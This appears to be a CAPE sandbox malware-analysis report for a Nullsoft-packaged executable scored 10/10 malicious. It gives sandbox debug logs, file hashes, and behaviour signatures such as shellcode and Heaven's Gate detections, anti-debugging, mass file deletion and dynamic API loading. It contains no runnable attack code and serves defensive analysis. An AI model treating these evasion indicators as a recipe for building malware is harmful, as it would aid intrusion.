2019-08-13 19:11:43,536 [root] DEBUG: DLL loaded at 0x000007FEEDC60000: C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.JScript\71e40c479d779f2bf55bb925834e3cd3\Microsoft.JScript.ni (0x313000 bytes).
2019-08-13 19:11:43,568 [root] DEBUG: DLL loaded at 0x000007FEFCEF0000: C:\Windows\system32\apphelp (0x57000 bytes).
2019-08-13 19:11:43,568 [root] INFO: Announced 64-bit process name: csc.exe pid: 1096
2019-08-13 19:11:43,568 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-08-13 19:11:43,568 [lib.api.process] INFO: 64-bit DLL to inject is C:\qyxzo\dll\llatUZE.dll, loader C:\qyxzo\bin\ANinQBgZ.exe
2019-08-13 19:11:43,584 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\lrdmqn.
2019-08-13 19:11:43,584 [root] DEBUG: Loader: Injecting process 1096 (thread 264) with C:\qyxzo\dll\llatUZE.dll.
2019-08-13 19:11:43,584 [root] DEBUG: Process image base: 0x0000000000400000
2019-08-13 19:11:43,584 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\qyxzo\dll\llatUZE.dll.
2019-08-13 19:11:43,584 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x0000000000419000 - 0x0000000077110000
2019-08-13 19:11:43,584 [root] DEBUG: InjectDllViaIAT: Allocated 0x228 bytes for new import table at 0x0000000000420000.
2019-08-13 19:11:43,584 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-08-13 19:11:43,584 [root] DEBUG: Successfully injected DLL C:\qyxzo\dll\llatUZE.dll.
2019-08-13 19:11:43,584 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 1096
2019-08-13 19:11:43,584 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-08-13 19:11:43,584 [root] DEBUG: Process dumps enabled.
2019-08-13 19:11:43,598 [root] INFO: Disabling sleep skipping.
2019-08-13 19:11:43,598 [root] WARNING: Unable to place hook on LockResource
2019-08-13 19:11:43,598 [root] WARNING: Unable to hook LockResource
2019-08-13 19:11:43,598 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-08-13 19:11:43,598 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 1096 at 0x0000000074460000, image base 0x0000000000400000, stack from 0x0000000000126000-0x0000000000130000
2019-08-13 19:11:43,598 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" \noconfig \fullpaths @"C:\Users\user\AppData\Local\Temp\9zdcwezu.cmdline".
2019-08-13 19:11:43,598 [root] INFO: Added new process to list with pid: 1096
2019-08-13 19:11:43,598 [root] INFO: Monitor successfully loaded in process with pid 1096.
2019-08-13 19:11:43,630 [root] DEBUG: DLL loaded at 0x000007FEFC1C0000: C:\Windows\system32\VERSION (0xc000 bytes).
2019-08-13 19:11:43,630 [root] DEBUG: DLL unloaded from 0x0000000000400000.
2019-08-13 19:11:43,630 [root] DEBUG: DLL loaded at 0x000007FEF2F10000: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei (0x97000 bytes).
2019-08-13 19:11:43,630 [root] DEBUG: DLL loaded at 0x000007FEF2480000: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorwks (0x99d000 bytes).
2019-08-13 19:11:43,645 [root] DEBUG: DLL loaded at 0x000007FEFCF50000: C:\Windows\system32\CRYPTBASE (0xf000 bytes).
2019-08-13 19:11:43,645 [root] DEBUG: DLL loaded at 0x000000059C800000: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\alink (0x23000 bytes).
2019-08-13 19:11:43,645 [root] DEBUG: DLL loaded at 0x000007FEFE400000: C:\Windows\system32\CLBCatQ (0x99000 bytes).
2019-08-13 19:11:43,661 [root] DEBUG: DLL loaded at 0x000007FEFC8F0000: C:\Windows\system32\CRYPTSP (0x17000 bytes).
2019-08-13 19:11:43,661 [root] DEBUG: DLL loaded at 0x000007FEFC5F0000: C:\Windows\system32\rsaenh (0x47000 bytes).
2019-08-13 19:11:43,707 [root] DEBUG: DLL loaded at 0x000007FEF4FC0000: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorpe (0x2c000 bytes).
2019-08-13 19:11:43,707 [root] DEBUG: DLL loaded at 0x0000000516F00000: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\diasymreader (0xc6000 bytes).
2019-08-13 19:11:43,740 [root] DEBUG: DLL loaded at 0x000007FEFCEF0000: C:\Windows\system32\apphelp (0x57000 bytes).
2019-08-13 19:11:43,740 [root] INFO: Announced 64-bit process name: cvtres.exe pid: 2276
2019-08-13 19:11:43,740 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-08-13 19:11:43,740 [lib.api.process] INFO: 64-bit DLL to inject is C:\qyxzo\dll\llatUZE.dll, loader C:\qyxzo\bin\ANinQBgZ.exe
2019-08-13 19:11:43,755 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\lrdmqn.
2019-08-13 19:11:43,755 [root] DEBUG: Loader: Injecting process 2276 (thread 224) with C:\qyxzo\dll\llatUZE.dll.
2019-08-13 19:11:43,755 [root] DEBUG: Process image base: 0x0000000000400000
2019-08-13 19:11:43,755 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\qyxzo\dll\llatUZE.dll.
2019-08-13 19:11:43,755 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x000000000040D000 - 0x0000000077110000
2019-08-13 19:11:43,755 [root] DEBUG: InjectDllViaIAT: Allocated 0x1b0 bytes for new import table at 0x0000000000410000.
2019-08-13 19:11:43,755 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-08-13 19:11:43,755 [root] DEBUG: Successfully injected DLL C:\qyxzo\dll\llatUZE.dll.
2019-08-13 19:11:43,755 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 2276
2019-08-13 19:11:43,755 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-08-13 19:11:43,770 [root] DEBUG: Process dumps enabled.
2019-08-13 19:11:43,770 [root] INFO: Disabling sleep skipping.
2019-08-13 19:11:43,770 [root] WARNING: Unable to place hook on LockResource
2019-08-13 19:11:43,770 [root] WARNING: Unable to hook LockResource
2019-08-13 19:11:43,770 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-08-13 19:11:43,770 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 2276 at 0x0000000074460000, image base 0x0000000000400000, stack from 0x0000000000126000-0x0000000000130000
2019-08-13 19:11:43,770 [root] DEBUG: Commandline: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe \NOLOGO \READONLY \MACHINE:IX86 "\OUT:C:\Users\user\AppData\Local\Temp\RESC794.tmp" "c:\Users\user\AppData\Local\Temp\CSCC783.tmp".
2019-08-13 19:11:43,770 [root] INFO: Added new process to list with pid: 2276
2019-08-13 19:11:43,786 [root] INFO: Monitor successfully loaded in process with pid 2276.
2019-08-13 19:11:43,786 [root] DEBUG: DLL loaded at 0x000007FEFC8F0000: C:\Windows\system32\CRYPTSP (0x17000 bytes).
2019-08-13 19:11:43,786 [root] DEBUG: DLL loaded at 0x000007FEFC5F0000: C:\Windows\system32\rsaenh (0x47000 bytes).
2019-08-13 19:11:43,786 [root] DEBUG: DLL loaded at 0x000007FEFCF50000: C:\Windows\system32\CRYPTBASE (0xf000 bytes).
2019-08-13 19:11:43,802 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 2276
2019-08-13 19:11:43,802 [root] DEBUG: GetHookCallerBase: thread 224 (handle 0x0), return address 0x0000000000405A77, allocation base 0x0000000000400000.
2019-08-13 19:11:43,802 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x0000000000400000.
2019-08-13 19:11:43,802 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x0000000000400000.
2019-08-13 19:11:43,802 [root] DEBUG: DumpProcess: Module entry point VA is 0x0000000000005BE0.
2019-08-13 19:11:43,818 [root] INFO: Added new CAPE file to list with path: C:\hUNeBkt\CAPE\2276_212908034643112113282019
2019-08-13 19:11:43,818 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x9400.
2019-08-13 19:11:43,832 [root] DEBUG: DLL unloaded from 0x000007FEFF190000.
2019-08-13 19:11:43,832 [root] INFO: Notified of termination of process with pid 2276.
2019-08-13 19:11:43,848 [root] DEBUG: DLL unloaded from 0x000000059C800000.
2019-08-13 19:11:43,864 [root] DEBUG: DLL unloaded from 0x000007FEF4FC0000.
2019-08-13 19:11:43,864 [root] DEBUG: DLL unloaded from 0x000007FEF38B0000.
2019-08-13 19:11:43,864 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 1096
2019-08-13 19:11:43,864 [root] DEBUG: GetHookCallerBase: thread 264 (handle 0x0), return address 0x000000000040D6A7, allocation base 0x0000000000400000.
2019-08-13 19:11:43,864 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x0000000000400000.
2019-08-13 19:11:43,864 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x0000000000400000.
2019-08-13 19:11:43,864 [root] DEBUG: DumpProcess: Module entry point VA is 0x000000000000D810.
2019-08-13 19:11:43,880 [root] INFO: Added new CAPE file to list with path: C:\hUNeBkt\CAPE\1096_170745307243112113282019
2019-08-13 19:11:43,880 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x16000.
2019-08-13 19:11:43,880 [root] DEBUG: DLL unloaded from 0x0000000076FF0000.
2019-08-13 19:11:43,880 [root] DEBUG: DLL unloaded from 0x000007FEF2480000.
2019-08-13 19:11:43,880 [root] DEBUG: DLL unloaded from 0x000007FEF2F10000.
2019-08-13 19:11:43,895 [root] DEBUG: DLL unloaded from 0x000007FEFF190000.
2019-08-13 19:11:43,895 [root] INFO: Notified of termination of process with pid 1096.
2019-08-13 19:11:43,911 [root] DEBUG: set_caller_info: Adding region at 0x000007FF00290000 to caller regions list (ntdll::NtAllocateVirtualMemory).
2019-08-13 19:11:43,911 [root] DEBUG: set_caller_info: Adding region at 0x0000000003330000 to caller regions list (ntdll::NtAllocateVirtualMemory).
2019-08-13 19:11:43,911 [root] DEBUG: set_caller_info: Adding region at 0x00000000034D0000 to caller regions list (ntdll::LdrLoadDll).
2019-08-13 19:11:43,927 [root] DEBUG: DLL loaded at 0x000007FEFEC80000: C:\Windows\system32\WININET (0x12a000 bytes).
2019-08-13 19:11:43,941 [root] DEBUG: DLL loaded at 0x000007FEFEB00000: C:\Windows\system32\urlmon (0x178000 bytes).
2019-08-13 19:11:43,941 [root] DEBUG: DLL loaded at 0x000007FEFF1C0000: C:\Windows\system32\iertutil (0x259000 bytes).
2019-08-13 19:11:43,941 [root] INFO: Announced 64-bit process name: explorer.exe pid: 1632
2019-08-13 19:11:43,941 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-08-13 19:11:43,941 [lib.api.process] INFO: 64-bit DLL to inject is C:\qyxzo\dll\llatUZE.dll, loader C:\qyxzo\bin\ANinQBgZ.exe
2019-08-13 19:11:43,957 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\lrdmqn.
2019-08-13 19:11:43,957 [root] DEBUG: Loader: Injecting process 1632 (thread 0) with C:\qyxzo\dll\llatUZE.dll.
2019-08-13 19:11:43,957 [root] DEBUG: InjectDll: No thread ID supplied. Initial thread ID 1636, handle 0x84
2019-08-13 19:11:43,957 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 2084
2019-08-13 19:11:43,957 [root] DEBUG: Process image base: 0x00000000FF900000
2019-08-13 19:11:43,957 [root] DEBUG: GetHookCallerBase: thread 2340 (handle 0x0), return address 0x000000013FB0C504, allocation base 0x000000013FB00000.
2019-08-13 19:11:43,957 [root] DEBUG: InjectDllViaIAT: Not a new process, aborting IAT patch
2019-08-13 19:11:43,957 [root] DEBUG: InjectDll: IAT patching failed, falling back to thread injection.
2019-08-13 19:11:43,957 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x000000013FB00000.
2019-08-13 19:11:43,973 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-08-13 19:11:43,973 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x000000013FB00000.
2019-08-13 19:11:43,973 [root] DEBUG: Process dumps enabled.
2019-08-13 19:11:43,973 [root] DEBUG: DumpProcess: Module entry point VA is 0x000000000000C63C.
2019-08-13 19:11:43,973 [root] INFO: Disabling sleep skipping.
2019-08-13 19:11:43,973 [root] WARNING: Unable to place hook on LockResource
2019-08-13 19:11:43,989 [root] WARNING: Unable to hook LockResource
2019-08-13 19:11:43,989 [root] INFO: Added new CAPE file to list with path: C:\hUNeBkt\CAPE\2084_58497454653212113282019
2019-08-13 19:11:43,989 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x73e00.
2019-08-13 19:11:43,989 [root] DEBUG: DLL loaded at 0x000007FEFAC20000: C:\Windows\system32\netutils (0xc000 bytes).
2019-08-13 19:11:43,989 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 1632 at 0x0000000074460000, image base 0x00000000FF900000, stack from 0x0000000004382000-0x0000000004390000
2019-08-13 19:11:43,989 [root] DEBUG: Commandline: C:\Windows\explorer.exe.
2019-08-13 19:11:44,005 [root] INFO: Added new process to list with pid: 1632
2019-08-13 19:11:44,005 [root] INFO: Monitor successfully loaded in process with pid 1632.
2019-08-13 19:11:44,005 [root] DEBUG: DLL unloaded from 0x000007FEFB840000.
2019-08-13 19:11:44,005 [root] DEBUG: InjectDllViaThread: Successfully injected Dll into process via RtlCreateUserThread.
2019-08-13 19:11:44,005 [root] DEBUG: InjectDll: Successfully injected DLL via thread.
2019-08-13 19:11:44,005 [root] DEBUG: DLL unloaded from 0x000007FEFC500000.
2019-08-13 19:11:44,005 [root] DEBUG: Successfully injected DLL C:\qyxzo\dll\llatUZE.dll.
2019-08-13 19:11:44,005 [root] DEBUG: DLL unloaded from 0x0000000076FF0000.
2019-08-13 19:11:44,005 [root] DEBUG: DLL unloaded from 0x000007FEF2480000.
2019-08-13 19:11:44,005 [root] DEBUG: DLL unloaded from 0x000007FEF2F10000.
2019-08-13 19:11:44,019 [root] DEBUG: DLL unloaded from 0x000007FEFC190000.
2019-08-13 19:11:44,019 [root] DEBUG: DLL unloaded from 0x000007FEFF190000.
2019-08-13 19:11:44,019 [root] INFO: Notified of termination of process with pid 2084.
2019-08-13 19:11:44,286 [root] INFO: Process with pid 2084 has terminated
2019-08-13 19:11:44,286 [root] INFO: Process with pid 2276 has terminated
2019-08-13 19:11:45,299 [root] INFO: Process with pid 1096 has terminated
2019-08-13 19:13:38,555 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF8390000 to caller regions list (ntdll::NtDuplicateObject).
2019-08-13 19:13:38,602 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF45C0000 to caller regions list (ntdll::NtDuplicateObject).
2019-08-13 19:14:42,750 [root] INFO: Analysis timeout hit (200 seconds), terminating analysis.
2019-08-13 19:14:42,750 [root] INFO: Created shutdown mutex.
2019-08-13 19:14:43,763 [lib.api.process] INFO: Successfully received reply to terminate_event, pid 1632
2019-08-13 19:14:43,763 [root] INFO: Terminate event set for process 1632.
2019-08-13 19:14:43,763 [root] DEBUG: Terminate Event: Attempting to dump process 1632
2019-08-13 19:14:43,763 [root] INFO: Terminating process 1632 before shutdown.
2019-08-13 19:14:43,763 [root] INFO: Waiting for process 1632 to exit.
2019-08-13 19:14:43,763 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x00000000FF900000.
2019-08-13 19:14:43,763 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00000000FF900000.
2019-08-13 19:14:43,779 [root] DEBUG: DumpProcess: Module entry point VA is 0x000000000002B790.
2019-08-13 19:14:43,872 [root] INFO: Added new CAPE file to list with path: C:\hUNeBkt\CAPE\1632_85580443141813282019
2019-08-13 19:14:43,872 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x2bd200.
2019-08-13 19:14:44,770 [root] INFO: Shutting down package.
2019-08-13 19:14:44,770 [root] INFO: Stopping auxiliary modules.
2019-08-13 19:14:44,770 [root] INFO: Finishing auxiliary modules.
2019-08-13 19:14:44,770 [root] INFO: Shutting down pipe server and dumping dropped files.
2019-08-13 19:14:44,770 [root] WARNING: File at path "C:\hUNeBkt\debugger" does not exist, skip.
2019-08-13 19:14:44,770 [root] INFO: Analysis completed.

MalScore

10.0

Malicious

Machine

Name Label Manager Started On Shutdown On
target-01 target-01 ESX 2019-08-13 18:11:18 2019-08-13 18:14:59

File Details

File Name new.exe
File Size 154210 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
MD5 bed6d7a32547702a1099a53b3083f6c8
SHA1 42d88bc727180c55a58796e6f811a005406c5456
SHA256 4a8cbc6f8cf9201c62a1a2ba9f979a66748959b3ab9b69716019d8e9c784edbe
SHA512 7ce1c609478ec2bc4a7e2db07e1cdb98b5d64d67ce6fdb4979d4099bc19be86b0ebfe975ae767eca1b457d52ecacf7e6cd5a6fa409c29e8ac827474612ba91f1
CRC32 48699A60
Ssdeep 3072:YYrClLswbDkrcUptnoyOLF6tEUcN+W5c2VW81:Y7eNtnLZEUy3
TrID
  • 64.5% (.EXE) Win32 Executable MS Visual C++ (generic) (31206/45/13)
  • 13.6% (.DLL) Win32 Dynamic Link Library (generic) (6578/25/2)
  • 9.3% (.EXE) Win32 Executable (generic) (4508/7/1)
  • 4.1% (.EXE) OS/2 Executable (generic) (2029/13)
  • 4.1% (.EXE) Generic Win/DOS Executable (2002/3)
ClamAV None matched
Yara None matched
CAPE Yara None matched
Resubmit sample

Signatures

SetUnhandledExceptionFilter detected (possible anti-debug)
Scheduled file move on reboot detected
File Move on Reboot: Old: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VSG2JVG94V2257O0TMPH.temp -> New: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Yara rule detections observed from a process memory dump/dropped files/CAPE
Hit: PID 1332 trigged the Yara rule 'shellcode'
Hit: PID 1332 trigged the Yara rule 'HeavensGate'
Creates RWX memory
Possible date expiration check, exits too soon after checking local time
process: new.exe, PID 1332
Anomalous file deletion behavior detected (10+)
DeletedFile: C:\Users\user\AppData\Local\Temp\nst6FC3.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\nse9B27.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\9zdcwezu.cmdline
DeletedFile: C:\Users\user\AppData\Local\Temp\9zdcwezu.pdb
DeletedFile: C:\Users\user\AppData\Local\Temp\9zdcwezu.dll
DeletedFile: C:\Users\user\AppData\Local\Temp\9zdcwezu.0.cs
DeletedFile: C:\Users\user\AppData\Local\Temp\9zdcwezu.out
DeletedFile: C:\Users\user\AppData\Local\Temp\9zdcwezu.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\9zdcwezu.err
DeletedFile: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config.cch.2084.13816124
DeletedFile: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config.cch.2084.13816124
DeletedFile: C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config.cch.2084.13816139
DeletedFile: C:\Users\user\AppData\Local\Temp\RESC794.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\CSCC783.tmp
Guard pages use detected - possible anti-debugging.
Dynamic (imported) function loading detected
DynamicLoader: VERSION.dll/GetFileVersionInfoA
DynamicLoader: SHFOLDER.dll/SHGetFolderPathA
DynamicLoader: SHLWAPI.dll/
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_Size_ExW
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_ExW
DynamicLoader: COMCTL32.dll/
DynamicLoader: COMCTL32.dll/
DynamicLoader: kernel32.dll/GetUserDefaultUILanguage
DynamicLoader: ole32.dll/OleInitialize
DynamicLoader: PROPSYS.dll/PSCreateMemoryPropertyStore
DynamicLoader: PROPSYS.dll/PSPropertyBag_WriteDWORD
DynamicLoader: PROPSYS.dll/PSPropertyBag_ReadDWORD
DynamicLoader: PROPSYS.dll/PSPropertyBag_ReadGUID
DynamicLoader: urlmon.dll/CreateUri
DynamicLoader: kernel32.dll/InitializeSRWLock
DynamicLoader: kernel32.dll/AcquireSRWLockExclusive
DynamicLoader: kernel32.dll/AcquireSRWLockShared
DynamicLoader: kernel32.dll/ReleaseSRWLockExclusive
DynamicLoader: kernel32.dll/ReleaseSRWLockShared
DynamicLoader: kernel32.dll/InitializeSRWLock
DynamicLoader: kernel32.dll/AcquireSRWLockExclusive
DynamicLoader: kernel32.dll/AcquireSRWLockShared
DynamicLoader: kernel32.dll/ReleaseSRWLockExclusive
DynamicLoader: kernel32.dll/ReleaseSRWLockShared
DynamicLoader: ADVAPI32.dll/AddMandatoryAce
DynamicLoader: VERSION.dll/GetFileVersionInfoSizeW
DynamicLoader: VERSION.dll/GetFileVersionInfoW
DynamicLoader: VERSION.dll/VerQueryValueW
DynamicLoader: urlmon.dll/
DynamicLoader: urlmon.dll/
DynamicLoader: urlmon.dll/
DynamicLoader: ole32.dll/OleUninitialize
DynamicLoader: ole32.dll/CoRevokeInitializeSpy
DynamicLoader: COMCTL32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: SHELL32.dll/
DynamicLoader: System.dll/Call
DynamicLoader: System.dll/Call
DynamicLoader: USER32.dll/wsprintf
DynamicLoader: USER32.dll/wsprintfA
DynamicLoader: System.dll/Call
DynamicLoader: kernel32.dll/CreateFile
DynamicLoader: kernel32.dll/CreateFileA
DynamicLoader: System.dll/Call
DynamicLoader: System.dll/Call
DynamicLoader: System.dll/Call
DynamicLoader: System.dll/Call
DynamicLoader: USER32.dll/wsprintf
DynamicLoader: USER32.dll/wsprintfA
DynamicLoader: System.dll/Call
DynamicLoader: System.dll/Call
DynamicLoader: ntdll.dll/NtCreateSection
DynamicLoader: System.dll/Call
DynamicLoader: System.dll/Call
DynamicLoader: System.dll/Call
DynamicLoader: System.dll/Call
DynamicLoader: System.dll/Call
DynamicLoader: ntdll.dll/NtMapViewOfSection
DynamicLoader: System.dll/Call
DynamicLoader: System.dll/Call
DynamicLoader: kernel32.dll/ReadFile
DynamicLoader: kernel32.dll/ReadFileA
DynamicLoader: System.dll/Call
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: System.dll/Int64Op
DynamicLoader: System.dll/Int64Op
DynamicLoader: System.dll/Call
DynamicLoader: System.dll/Call
DynamicLoader: USER32.dll/wsprintf
DynamicLoader: USER32.dll/wsprintfA
DynamicLoader: System.dll/Call
DynamicLoader: System.dll/Call
DynamicLoader: CRYPTSP.dll/CryptAcquireContextW
DynamicLoader: CRYPTSP.dll/CryptCreateHash
DynamicLoader: CRYPTSP.dll/CryptHashData
DynamicLoader: CRYPTSP.dll/CryptDeriveKey
DynamicLoader: CRYPTSP.dll/CryptDestroyHash
DynamicLoader: CRYPTSP.dll/CryptDecrypt
DynamicLoader: CRYPTSP.dll/CryptDestroyKey
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: ADVAPI32.dll/UnregisterTraceGuids
DynamicLoader: COMCTL32.dll/
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: shell32.dll/
DynamicLoader: ole32.dll/CoGetApartmentType
DynamicLoader: ole32.dll/CoRegisterInitializeSpy
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: comctl32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoGetMalloc
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ole32.dll/CreateBindCtx
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ADVAPI32.dll/RegEnumKeyW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_Size_ExW
DynamicLoader: ADVAPI32.dll/InitializeSecurityDescriptor
DynamicLoader: ADVAPI32.dll/SetEntriesInAclW
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_ExW
DynamicLoader: ntmarta.dll/GetMartaExtensionInterface
DynamicLoader: ADVAPI32.dll/SetSecurityDescriptorDacl
DynamicLoader: ADVAPI32.dll/IsTextUnicode
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: shell32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: ole32.dll/CoGetMalloc
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ntdll.dll/RtlDllShutdownInProgress
DynamicLoader: propsys.dll/PSCreateMemoryPropertyStore
DynamicLoader: sechost.dll/ConvertSidToStringSidW
DynamicLoader: profapi.dll/
DynamicLoader: LINKINFO.dll/CreateLinkInfoW
DynamicLoader: USER32.dll/IsCharAlphaW
DynamicLoader: USER32.dll/CharPrevW
DynamicLoader: ntshrui.dll/GetNetResourceFromLocalPathW
DynamicLoader: srvcli.dll/NetShareEnum
DynamicLoader: cscapi.dll/CscNetApiGetInterface
DynamicLoader: slc.dll/SLGetWindowsInformationDWORD
DynamicLoader: SHLWAPI.dll/PathRemoveFileSpecW
DynamicLoader: LINKINFO.dll/DestroyLinkInfo
DynamicLoader: propsys.dll/PropVariantToBoolean
DynamicLoader: ole32.dll/PropVariantClear
DynamicLoader: CRYPTSP.dll/CryptAcquireContextW
DynamicLoader: CRYPTSP.dll/CryptGenRandom
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: ole32.dll/CoRevokeInitializeSpy
DynamicLoader: comctl32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryInfoKeyW
DynamicLoader: ADVAPI32.dll/RegEnumKeyExW
DynamicLoader: ADVAPI32.dll/RegEnumValueW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: mscoree.dll/
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: mscoreei.dll/RegisterShimImplCallback
DynamicLoader: mscoreei.dll/RegisterShimImplCleanupCallback
DynamicLoader: mscoreei.dll/SetShellShimInstance
DynamicLoader: mscoreei.dll/OnShimDllMainCalled
DynamicLoader: mscoreei.dll/CorBindToRuntimeEx_RetAddr
DynamicLoader: mscoreei.dll/CorBindToRuntimeEx
DynamicLoader: SHLWAPI.dll/UrlIsW
DynamicLoader: kernel32.dll/GetCurrentPackageId
DynamicLoader: kernel32.dll/InitializeCriticalSectionAndSpinCount
DynamicLoader: msvcrt.dll/_set_error_mode
DynamicLoader: msvcrt.dll/?set_terminate@@YAP6AXXZP6AXXZ@Z
DynamicLoader: msvcrt.dll/_get_terminate
DynamicLoader: kernel32.dll/FindActCtxSectionStringW
DynamicLoader: kernel32.dll/GetSystemWindowsDirectoryW
DynamicLoader: mscoree.dll/GetProcessExecutableHeap
DynamicLoader: mscoreei.dll/GetProcessExecutableHeap_RetAddr
DynamicLoader: mscoreei.dll/GetProcessExecutableHeap
DynamicLoader: mscorwks.dll/SetLoadedByMscoree
DynamicLoader: mscorwks.dll/DllGetClassObjectInternal
DynamicLoader: mscorwks.dll/GetCLRFunction
DynamicLoader: ADVAPI32.dll/RegisterTraceGuidsW
DynamicLoader: ADVAPI32.dll/UnregisterTraceGuids
DynamicLoader: ADVAPI32.dll/GetTraceLoggerHandle
DynamicLoader: ADVAPI32.dll/GetTraceEnableLevel
DynamicLoader: ADVAPI32.dll/GetTraceEnableFlags
DynamicLoader: ADVAPI32.dll/TraceEvent
DynamicLoader: mscoree.dll/IEE
DynamicLoader: mscoreei.dll/IEE_RetAddr
DynamicLoader: mscoreei.dll/IEE
DynamicLoader: mscorwks.dll/IEE
DynamicLoader: mscoree.dll/GetStartupFlags
DynamicLoader: mscoreei.dll/GetStartupFlags_RetAddr
DynamicLoader: mscoreei.dll/GetStartupFlags
DynamicLoader: mscoree.dll/GetHostConfigurationFile
DynamicLoader: mscoreei.dll/GetHostConfigurationFile_RetAddr
DynamicLoader: mscoreei.dll/GetHostConfigurationFile
DynamicLoader: mscoreei.dll/GetCORVersion_RetAddr
DynamicLoader: mscoreei.dll/GetCORVersion
DynamicLoader: mscoree.dll/GetCORSystemDirectory
DynamicLoader: mscoreei.dll/GetCORSystemDirectory_RetAddr
DynamicLoader: mscoreei.dll/CreateConfigStream_RetAddr
DynamicLoader: mscoreei.dll/CreateConfigStream
DynamicLoader: ntdll.dll/RtlVirtualUnwind
DynamicLoader: kernel32.dll/IsWow64Process
DynamicLoader: kernel32.dll/GetSystemWindowsDirectoryW
DynamicLoader: ADVAPI32.dll/AllocateAndInitializeSid
